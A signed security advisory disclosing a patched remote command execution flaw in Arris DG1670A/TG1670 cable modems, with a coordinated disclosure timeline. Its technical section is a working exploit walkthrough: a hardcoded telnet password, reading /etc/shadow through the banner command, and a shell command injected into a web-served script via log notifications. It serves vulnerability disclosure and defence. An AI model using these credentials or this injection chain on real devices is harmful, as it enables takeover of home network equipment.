-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 KL-001-2016-001 : Arris DG1670A Cable Modem Remote Command Execution Title: Arris DG1670A Cable Modem Remote Command Execution Advisory ID: KL-001-2016-001 Publication Date: 2016.02.12 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-001.txt 1. Vulnerability Details Affected Vendor: Arris Affected Product: Cable Modem Affected Version: DG1670A, TG1670 Platform: Embedded Linux CWE Classification: CWE-73: External Control of File Name or Path; CWE-77: Improper Neutralization of Special Elements used in a Command; CWE-522: Insufficiently Protected Credentials Impact: Arbitrary Code Execution Attack vector: Telnet CVE-ID: 2. Vulnerability Description The Arris DG1670A leverages a combination of technologies to deliver the product functionality. Combining several of these technologies in an unanticipated way will allow an attacker to execute arbitrary commands on the underlying operating system as the most privileged user. 3. Technical Description Use the password: JhAkuo18 On August 28, 2015 a user on GitHub by the name of GuerrillaWarfare posted a new repository named Junkyard. The repository had firmware images for popular cable modems. Repository: https://github.com/GuerrillaWarfare/Junkyard Filename: TS0801102P_100714_NA.16XX.GW.ATOM.img Below is the directory content of the squashfs-root directory contained within the image: # ls bin etc gw.fsname include linuxrc nvram sbin share tmp var version dev fss hdisk1 lib mnt proc scripts sys usr var.tar vop The default IP address assigned to Arris modems is 192.168.100.1 and is routable from networks where the modem is attached. Below is a Nmap output of services listening on the default IP address: # sudo nmap -T5 -sU -sT -p- 192.168.100.1 Nmap scan report for 192.168.100.1 Host is up (0.0053s latency). PORT STATE SERVICE VERSION 80/tcp open http lighttpd 443/tcp open ssl/http lighttpd 2602/tcp open ripd? 8080/tcp open http lighttpd A service listening on port 2602 is usually associated with Quagga. Going back to the squashfs-root directory, if we grep through the content of this file system there are several .conf files containing passwords. One of the files containing passwords is zebra.conf, which can be used to authenticate to the Quagga telnet console. # grep -ri "password" *.conf|more etc/default/ripngd.conf:password JhAkuo18 etc/default/zebra.conf:password JhAkuo18 etc/default/ripd.conf:password JhAkuo18 $ telnet 192.168.100.1 2602 Trying 192.168.100.1... Connected to 192.168.100.1. Escape character is '^]'. Hello, this is Quagga (version 0.99.16). Copyright 1996-2005 Kunihiro Ishiguro, et al. User Access Verification Password: PROMPT> Entering a '?' at any point gives context-sensitive help text. There are several layers of 'privilege' though there are no restrictions on elevating on this device. Quagga is an open-source routing daemon commonly found in routers, access points, and modems. In the case described, it has been implemented on a cable modem to facilitate route provisioning from local ISP to the public internet. PROMPT> ? echo Echo a message back to the vty enable Turn on privileged mode command exit Exit current mode and down to previous mode help Description of the interactive help system list Print command list quit Exit current mode and down to previous mode show Show running system information terminal Set terminal line parameters who Display who is on vty PROMPT> enable PROMPT# ? clear Reset functions configure Configuration from vty interface copy Copy configuration debug Debugging functions (see also 'undebug') disable Turn off privileged mode command echo Echo a message back to the vty end End current mode and change to enable mode. exit Exit current mode and down to previous mode help Description of the interactive help system list Print command list logmsg Send a message to enabled logging destinations no Negate a command or set its defaults quit Exit current mode and down to previous mode show Show running system information terminal Set terminal line parameters who Display who is on vty write Write running configuration to memory, network, or terminal PROMPT# configure ? terminal Configuration terminal PROMPT# configure terminal PROMPT(config)# ? access-list Add an access list entry banner Set banner string debug Debugging functions (see also 'undebug') enable Modify enable password parameters end End current mode and change to enable mode. exit Exit current mode and down to previous mode help Description of the interactive help system hostname Set system's network name interface Select an interface to configure ip IP information ipv6 IPv6 information key Authentication key management line Configure a terminal line list Print command list log Logging control no Negate a command or set its defaults password Assign the terminal connection password quit Exit current mode and down to previous mode route-map Create route-map or enter route-map command mode router Enable a routing process service Set up miscellaneous service show Show running system information write Write running configuration to memory, network, or terminal The service message of the day banner can be abused to allow for arbitrary file reading. Also, the logging mechanism can be abused to allow for meaningful writes. The combination of these factors, along with a lack of shell metacharacter filtering, will be used to obtain remote command execution. PROMPT(config)# banner motd file ? file Banner from a file PROMPT(config)# log file ? FILENAME Logging filename PROMPT(config)# exit PROMPT# log notifications ? MESSAGE The message to send Reading arbitrary files: PROMPT(config)# banner motd file /etc/shadow # telnet 192.168.100.1 2602 Trying 192.168.100.1... Connected to 192.168.100.1. Escape character is '^]'. root:$1$xQWhDWOr$FYNAc2DuT2Q45OY7s2R43/:10063:0:99999:7::: User Access Verification Password: This password hash cracks to the word arris. Meaningful file writes: PROMPT# configure terminal PROMPT(config)# banner motd file /var/tmp/kore-log.txt PROMPT(config)# log file /var/tmp/kore-log.txt PROMPT(config)# exit PROMPT# log notifications KORELOGIC # telnet 192.168.100.1 2602 Trying 192.168.100.1... Connected to 192.168.100.1. Escape character is '^]'. 2015/09/10 07:16:50 RIP: KORELOGIC User Access Verification Password: It appears as though we can write to files. Further testing, confirmed that file permissions (and read-only mounted filesystems) heavily restrict the locations where writing is allowed. There are several shell scripts in the web root. # ls -la usr/www/*.sh lrwxrwxrwx 1 root root 18 Sep 5 04:55 usr/www/guioff.sh -> /var/tmp/guioff.sh lrwxrwxrwx 1 root root 17 Sep 5 04:55 usr/www/guion.sh -> /var/tmp/guion.sh # cat var/tmp/guion.sh echo 1 > /nvram/8/guiflag # cat var/tmp/guioff.sh echo 0 > /nvram/8/guiflag The lighttpd.conf file indicates there is a handler defined for shell scripts. #ARRIS CHANGE BEGIN #### CGI module cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl", ".sh" => "/bin/sh", "/walk" => "/fss/gw/usr/bin/web2snmp", "/snmpSet" => "/fss/gw/usr/bin/web2snmp", "/snmpGet" => "/fss/gw/usr/bin/web2snmp", "/login" => "/fss/gw/usr/bin/web2snmp", "/backup" => "/fss/gw/usr/bin/web2snmp", "/restore" => "/fss/gw/usr/bin/web2snmp", "/hsd" => "/fss/gw/usr/bin/web2snmp", "/setPassword" => "/fss/gw/usr/bin/web2snmp", # UNIHAN ADD START "/storelog" => "/fss/gw/usr/bin/web2snmp", "/checkPassword" => "/fss/gw/usr/bin/web2snmp" # UNIHAN ADD END ) PROMPT# configure terminal PROMPT(config)# log file /var/tmp/guion.sh PROMPT(config)# exit PROMPT# log notifications | `/bin/busybox uname -a >> /var/tmp/shell.txt 2>&1` PROMPT# configure terminal PROMPT(config)# banner motd file /var/tmp/shell.txt Followed by a GET request: GET /guion.sh HTTP/1.1 Host: 192.168.100.1:8080 User-Agent: Mozilla/5.0 Accept: text/plain, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 X-Requested-With: XMLHttpRequest Connection: close And response: HTTP/1.1 200 OK Content-Length: 0 Date: Wed, 09 Sep 2015 20:28:55 GMT Server: lighttpd Now we telnet: $ telnet 192.168.100.1 2602 Trying 192.168.100.1... Connected to 192.168.100.1. Escape character is '^]'. Linux ARRISGW 2.6.39.3 #1 PREEMPT Thu Nov 6 14:56:21 EST 2014 armv6b GNU/Linux User Access Verification Password: Note that the current upstream version of Quagga does not appear to be affected (tested against Quagga 0.99.24.1). First, the daemon runs with dropped privileges for operations like reading the motd file or writing logs. So, 'banner motd' cannot read a root-only file such as /etc/shadow, and 'log file /root/.ssh/authorized_keys' (for example) cannot write to a root-only file. Furthermore, in the scenario outlined here, triggering the shell commands written to the logfile required an additional moving part - the lighttpd server - which is not included in a Quagga install. 4. Mitigation and Remediation Recommendation The vendor has issued a patch for this vulnerability. KoreLogic wishes to thank Arris for their cooperation and attention to this issue. 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) and Hank Leininger of KoreLogic, Inc. 6. Disclosure Timeline 2015.09.21 - KoreLogic sends vulnerability report and PoC to Arris. 2015.09.21 - Arris acknowledges receipt of vulnerability report. 2015.09.30 - Arris contacts KoreLogic to obtain additional details. 2015.10.08 - Arris updates KoreLogic indicating they are working on a fix. 2015.10.21 - Arris contacts KoreLogic to discuss the patch timeline. 2015.11.23 - Arris contacts KoreLogic to discuss the patch timeline. 2015.12.07 - KoreLogic requests CVE from Mitre. 2016.01.28 - KoreLogic contacts Arris to ensure patch is ready for release. 2016.01.29 - KoreLogic requests CVE from Mitre. 2016.02.08 - KoreLogic requests CVE from Mitre. 2016.02.12 - Arris informs KoreLogic that the patch has been released to subscribers. 2016.02.12 - Coordinated Public Disclosure. 7. Proof of Concept N/A The contents of this advisory are copyright(c) 2016 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt -----BEGIN PGP SIGNATURE----- iQEcBAEBCAAGBQJWvjjVAAoJEE1lmiwOGYkMXU8H/1nd9RG4olLApzGIlIghl6f2 2FUXoyy083jxwbgLLsDm+BTek5kOOpphN8uA4QIpnPJsHVBv4odIVItiAxThSlUE BX9eOhPysL7H1z5mK5aBiYC+c1y3AGPQKjLS0KuZVlAbb9HAdcMk2PlHcpnGFWKK BbTK2HoW7T7SrlK8dGMAAP4816/xHlpjAW5xHAa7K7VB0JqPdtGCJc7gwWP/Fur7 8EkuIsGwCqksqb4xrvjMoO16hkKEdj0aUg/6QBVYLo0m2CecjsLfuTcazFDdiDay bE9AoFlH9rl/fgM9fz4x2FtIH9oA8inlhVbhswqNjl/vnNScTGuZG7vaSr14bcY= =YLtH -----END PGP SIGNATURE-----